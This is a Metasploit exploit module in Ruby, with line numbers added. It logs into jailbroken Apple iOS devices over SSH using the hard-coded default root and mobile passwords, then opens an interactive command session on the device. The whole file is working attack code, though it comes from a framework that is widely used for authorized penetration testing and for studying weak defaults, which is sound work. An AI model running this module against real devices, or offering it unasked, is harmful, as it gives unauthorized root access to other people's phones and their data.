Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::SSH
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Apple iOS Default SSH Password Vulnerability',
19
        'Description' => %q{
20
          This module exploits the default credentials of Apple iOS when it
21
          has been jailbroken and the passwords for the 'root' and 'mobile'
22
          users have not been changed.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'hdm'
27
        ],
28
        'References' => [
29
          ['OSVDB', '61284']
30
        ],
31
        'DefaultOptions' => {
32
          'EXITFUNC' => 'thread'
33
        },
34
        'Payload' => {
35
          'Compat' => {
36
            'PayloadType' => 'cmd_interact',
37
            'ConnectionType' => 'find'
38
          }
39
        },
40
        'Platform' => 'unix',
41
        'Arch' => ARCH_CMD,
42
        'Targets' => [
43
          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
44
        ],
45
        'Privileged' => true,
46
        'DisclosureDate' => '2007-07-02',
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Stability' => [CRASH_SAFE],
50
          'Reliability' => [REPEATABLE_SESSION],
51
          'SideEffects' => []
52
        }
53
      )
54
    )
55

56
    register_options(
57
      [
58
        Opt::RHOST(),
59
        Opt::RPORT(22)
60
      ], self.class
61
    )
62

63
    register_advanced_options(
64
      [
65
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
66
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
67
      ]
68
    )
69
  end
70

71
  def post_auth?
72
    true
73
  end
74

75
  def rhost
76
    datastore['RHOST']
77
  end
78

79
  def rport
80
    datastore['RPORT']
81
  end
82

83
  def do_login(user, pass)
84
    opts = ssh_client_defaults.merge({
85
      auth_methods: ['password', 'keyboard-interactive'],
86
      port: rport,
87
      password: pass
88
    })
89

90
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
91

92
    begin
93
      ssh = nil
94
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
95
        ssh = Net::SSH.start(rhost, user, opts)
96
      end
97
    rescue Rex::ConnectionError
98
      return
99
    rescue Net::SSH::Disconnect, ::EOFError
100
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
101
      return
102
    rescue ::Timeout::Error
103
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
104
      return
105
    rescue Net::SSH::AuthenticationFailed
106
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
107
    rescue Net::SSH::Exception => e
108
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
109
      return
110
    end
111

112
    if ssh
113
      conn = Net::SSH::CommandStream.new(ssh)
114
      ssh = nil
115
      return conn
116
    end
117

118
    return nil
119
  end
120

121
  def exploit
122
    target['accounts'].each do |info|
123
      user, pass = info
124
      print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
125
      conn = do_login(user, pass)
126
      next unless conn
127

128
      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
129
      handler(conn.lsock)
130
      break
131
    end
132
  end
133
end
134

135